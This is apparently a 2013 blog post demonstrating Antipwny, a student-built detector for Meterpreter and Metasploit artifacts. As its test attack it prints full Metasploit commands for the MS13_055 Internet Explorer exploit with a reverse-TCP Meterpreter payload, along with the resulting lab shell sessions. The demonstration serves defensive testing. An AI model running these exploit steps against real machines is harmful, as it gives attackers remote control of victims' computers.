Antipwny, by Rohan Vazarkar and David Bitner

In Summer and Fall of 2013, my students Rohan Vazarkar and David Bitner began the development of Antipwny, a host based intrusion detection system customized to detect Meterpreter payloads and other Metasploit artifacts.

The latest version of the tool is available on GitHub. It is written in C#, and requires a full .NET Framework 4.5 installation.

Right now (November 2013), it is functional, but incomplete. It happily detect Meterpreter and Metasploit in running memory, and comes complete with a GUI, though the GUI is not complete.

To see the tool in action, let’s target a Windows 7 SP1 x64 system. Grab a copy of Antipwny from GitHub, and grab your .NET installer. The installation of .NET is standard. Once that is done, simply uncompress the Antipwny archive in a convenient directory and run the tool located in the exe subdirectory; separate versions exist for 32 and 64 bit architectures. Once it is run, you obtain a simple GUI:
Base

The program runs in the background, periodically scanning memory for evidence of Meterpreter or Metasploit.

Speaking of which, we need to start thinking about an attack. For the exploit, we’ll use the MS13_055 CAnchor attack against Internet Explorer. This a relatively recent Metasploit module (it dates to September 2013) which I have found to be quite reliable. Let’s get things started in Kali:

       =[ metasploit v4.8.0-2013111301 [core:4.8 api:1.0]
+ -- --=[ 1218 exploits - 664 auxiliary - 189 post
+ -- --=[ 322 payloads - 30 encoders - 8 nops

msf > use exploit/windows/browser/ms13_055_canchor 
msf exploit(ms13_055_canchor) > set srvport 80
srvport => 80
msf exploit(ms13_055_canchor) > set uripath /
uripath => /
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_055_canchor) > set lhost 10.0.2.129
lhost => 10.0.2.129
msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) > 
[*] Started reverse handler on 10.0.2.129:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://10.0.2.129:80/
[*] Server started.

Go ahead and visit the problematic web page with Internet Explorer. In Kali, we see the result of the exploit

[*] 10.0.2.132       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.132       ms13_055_canchor - Sending exploit...
[*] Sending stage (768512 bytes) to 10.0.2.132
[*] Meterpreter session 1 opened (10.0.2.129:4444 -> 10.0.2.132:49161) at 2013-11-17 19:54:38 -0500
[*] Session ID 1 (10.0.2.129:4444 -> 10.0.2.132:49161) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1036)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 604
[*] 10.0.2.132       ms13_055_canchor - Using JRE ROP
[*] 10.0.2.132       ms13_055_canchor - Sending exploit...
[*] Sending stage (768512 bytes) to 10.0.2.132
[+] Successfully migrated to process 
[*] Meterpreter session 2 opened (10.0.2.129:4444 -> 10.0.2.132:49163) at 2013-11-17 19:54:45 -0500
[*] Session ID 2 (10.0.2.129:4444 -> 10.0.2.132:49163) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2788
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7SP1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Interestingly, when Internet Explorer realized that it could not load the web page when it first visited the Kali system, it happily reloaded the web page- so we ended up with two shells instead of one. Woot!

Back on the Windows system though, Antipwny almost immediately notes a problem with a pop-up in the system tray:
EventFound

Then, when the scan is complete (which runs every minute, though it can be run more often via the Rescan button) you end up with information about the attack:
Found
We see that Anipwny has detected both shells.

If you right-click on each of the noted Meterpreter sessions, you have the option to kill the process. If you do so, the attacker on Kali discovers

meterpreter > [*] 10.0.2.132 - Meterpreter session 2 closed.  Reason: Died

[*] 10.0.2.132 - Meterpreter session 1 closed.  Reason: Died

Nice!

You can see a much more extensive demonstration of their tool from their conference presentation at B-Sides Delaware in November 2013:

  1. February 25, 2015 at 7:14 pm

    just to let you know that the x86 exe gives a error – The application was unable to start correctly (0x000007b) click ok to close application

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: